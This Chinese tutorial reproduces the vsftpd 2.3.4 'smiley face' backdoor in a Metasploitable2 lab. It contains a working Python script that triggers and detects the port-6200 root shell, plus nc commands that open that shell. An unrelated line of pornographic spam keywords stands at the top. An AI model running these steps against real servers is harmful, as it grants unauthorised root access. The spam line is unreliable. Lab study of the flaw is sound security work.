欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Python腳本檢測(cè)笑臉漏洞的問題復(fù)現(xiàn)

 更新時(shí)間:2024年10月23日 09:01:49   作者:TFIRE  
Python腳本有效檢測(cè)vsftpd2.3.4版本中的笑臉漏洞,該漏洞存在于6200端口,允許任何人連接,輸入帶有特定表情符號(hào)的用戶名和任意密碼即可觸發(fā),本文介紹了環(huán)境搭建、漏洞掃描和利用過程,通過nc命令演示了漏洞復(fù)現(xiàn)步驟

Python腳本檢測(cè)笑臉漏洞

一、漏洞介紹

? vsftpd2.3.4中在6200端口存在一個(gè)shell,使得任何人都可以進(jìn)行連接,并且VSFTPD v2.3.4 服務(wù),是以 root 權(quán)限運(yùn)行的,最終我們提到的權(quán)限也是root;當(dāng)連接帶有vsftpd 2.3.4版本的服務(wù)器的21端口時(shí),輸入用戶中帶有“?? ”,密碼任意,因此也稱為笑臉漏洞。

二、環(huán)境搭建

攻擊機(jī)(本機(jī)):125.217.53.182

靶機(jī)(metaspolit2):192.168.126.129

namp漏洞掃描

我們發(fā)現(xiàn)21端口是打開的,而且版本也相對(duì)應(yīng),接下來我們使用python腳本進(jìn)行漏洞檢測(cè)

import socket
from ftplib import FTP
url = input("請(qǐng)輸入你需要檢測(cè)的地址:")
ftp = FTP()
username = 'root:)' #用戶名必須包含:)這兩個(gè)字符
password = 'anonymous' #密碼隨便啥都行
try:
    ftp.connect(url,21,timeout=10)#使用ftp登錄,設(shè)置延時(shí)10秒
    ftp.login(username,password)
    ftp.quit()
except:
    print("完成登錄檢測(cè)")
try:
    s = socket.socket() #使用socket函數(shù)來檢測(cè)是否有漏洞存在
    s.connect((url,6200))
    s.close()
    print("存在微笑漏洞")
except:
    print("沒有發(fā)現(xiàn)笑臉漏洞!")

輸入我們需要攻擊的ip地址,

發(fā)現(xiàn)存在笑臉漏洞

三、漏洞復(fù)現(xiàn)

(一)使用nc進(jìn)行漏洞利用

1、打開命令行登錄ftp服務(wù)器,在用戶名處輸入xiaofeng:)然后隨意輸入一個(gè)密碼回車等待,緊接著進(jìn)行下一步:

image

2、打開一個(gè)新窗口,輸入nc 目標(biāo)ip 6200 即可連接。

復(fù)現(xiàn)完成

到此這篇關(guān)于Python腳本檢測(cè)笑臉漏洞的文章就介紹到這了,更多相關(guān)Python腳本檢測(cè)笑臉漏洞內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

最新評(píng)論